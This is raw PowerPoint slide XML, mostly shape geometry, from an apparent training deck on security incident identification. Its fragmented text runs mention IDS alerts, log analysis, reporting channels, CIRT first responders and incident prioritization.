                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167225" y="721482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206713" y="746051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249115" y="765806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294064" y="780377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341195" y="789392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390144" y="792479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439092" y="789392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486223" y="780377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531172" y="765806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573574" y="746051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613062" y="721482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649273" y="692472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681841" y="659392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710400" y="622613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734586" y="582507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754032" y="539445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768375" y="493799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777249" y="445940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780288" y="396239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777249" y="346539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768375" y="298680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754032" y="253034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734586" y="209972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710400" y="169866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681841" y="133087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649273" y="100007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613062" y="70997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573574" y="46428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531172" y="26673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486223" y="12102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439092" y="3087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390144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875020" y="6812280"/>
            <a:ext cx="779145" cy="791210"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="779145" h="791209">
                <a:moveTo>
                  <a:pt x="389381" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="340546" y="3080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293518" y="12076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248664" y="26617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206348" y="46331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166936" y="70850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130793" y="99801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98284" y="132815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69774" y="169522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45629" y="209551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26214" y="252531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11894" y="298093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3034" y="345865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="395478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3034" y="445090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11894" y="492862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26214" y="538424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45629" y="581404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69774" y="621433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98284" y="658140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130793" y="691154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166936" y="720105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206348" y="744624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248664" y="764338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293518" y="778879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340546" y="787875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389381" y="790956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438217" y="787875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485245" y="778879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="530099" y="764338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572415" y="744624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611827" y="720105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647970" y="691154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680479" y="658140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="708989" y="621433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733134" y="581404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752549" y="538424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766869" y="492862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775729" y="445090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="778763" y="395478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775729" y="345865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766869" y="298093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752549" y="252531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733134" y="209551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="708989" y="169522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680479" y="132815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647970" y="99801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611827" y="70850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572415" y="46331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="530099" y="26617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485245" y="12076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438217" y="3080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389381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20328" y="5673852"/>
            <a:ext cx="152400" cy="15544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63456" y="7293864"/>
            <a:ext cx="149351" cy="1539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72043" y="5056632"/>
            <a:ext cx="149351" cy="15544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49440" y="5466588"/>
            <a:ext cx="149351" cy="15392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09459" y="7171943"/>
            <a:ext cx="155448" cy="158495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0542523" y="7213218"/>
            <a:ext cx="30924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05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528175" y="5545073"/>
            <a:ext cx="30924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04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69304" y="5383783"/>
            <a:ext cx="30924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02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62217" y="7058100"/>
            <a:ext cx="30924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01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6135115" y="306451"/>
            <a:ext cx="3986529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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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41976" y="760476"/>
            <a:ext cx="5940552" cy="365759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2449195" y="1598172"/>
            <a:ext cx="11351895" cy="2776220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="622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90"/>
              </a:spcBef>
            </a:pP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Identification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process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compiling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events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determining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which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ones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should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endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="4445">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pP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managed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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as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incidents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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as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possible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precursors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incidents.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3810">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Ways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record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events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precursors:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3662679" marR="3796029">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>mechanisms</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(IDS,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>log </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>analysis,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t> alerts)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="299085">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2670"/>
              </a:spcBef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03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295890" y="5319141"/>
            <a:ext cx="1536065" cy="69723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22860" marR="5080" indent="-10795">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="135">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>cati</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="70">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>n  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>procedures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223752" y="7029450"/>
            <a:ext cx="3251835" cy="69723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657225" marR="5080" indent="-645160">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Confidential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>reporting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>whistleblowing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511422" y="6967219"/>
            <a:ext cx="210439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20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Public</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>reporting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536696" y="5222494"/>
            <a:ext cx="1501140" cy="69723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 indent="249554">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="70">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Manual </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="114">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>spections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115" y="306451"/>
            <a:ext cx="398716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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identification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68467" y="760476"/>
            <a:ext cx="5929884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593848" y="7039356"/>
            <a:ext cx="12059920" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12059919" h="984884">
                <a:moveTo>
                  <a:pt x="11895328" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11895328" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11938967" y="978642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11978169" y="962100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12011374" y="936442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12037022" y="903233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12053554" y="864037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12059412" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12059412" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12053554" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12037022" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12011374" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11978169" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11938967" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11895328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866134" y="7338186"/>
            <a:ext cx="950976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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>First </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>responder</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t> is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>member</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="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45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>CIRT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>taking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>charge</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>reported</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>incident.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01005" y="4130802"/>
            <a:ext cx="6468110" cy="2075814"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6468109" h="2075814">
                <a:moveTo>
                  <a:pt x="0" y="345948"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3159" y="299016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12361" y="254000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27193" y="211312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47243" y="171365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72098" y="134572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101345" y="101346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134572" y="72098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="171365" y="47244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211312" y="27193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253999" y="12361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299016" y="3159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345948" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6121908" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6168839" y="3159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6213856" y="12361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6256543" y="27193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6296490" y="47243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6333283" y="72098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6366510" y="101345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6395757" y="134572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6420612" y="171365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6440662" y="211312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6455494" y="253999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6464696" y="299016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467856" y="345948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467856" y="1729739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6464696" y="1776671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6455494" y="1821688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6440662" y="1864375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6420611" y="1904322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6395757" y="1941115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6366509" y="1974342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6333283" y="2003589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6296490" y="2028444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6256543" y="2048494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6213856" y="2063326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6168839" y="2072528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6121908" y="2075688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345948" y="2075688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299016" y="2072528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254000" y="2063326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211312" y="2048494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="171365" y="2028444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134572" y="2003589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101346" y="1974342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72098" y="1941115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47244" y="1904322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27193" y="1864375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12361" y="1821687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159" y="1776671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1729739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="345948"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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231129" y="4589779"/>
            <a:ext cx="5682615" cy="11258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Classify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prioritize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incident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95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Downgrade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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>low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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>priority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alerts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log-only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81910" y="1598172"/>
            <a:ext cx="12085320" cy="1822450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="622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90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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10">
                <a:solidFill>
                  <a:srgbClr val="3B4043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0">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>major</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
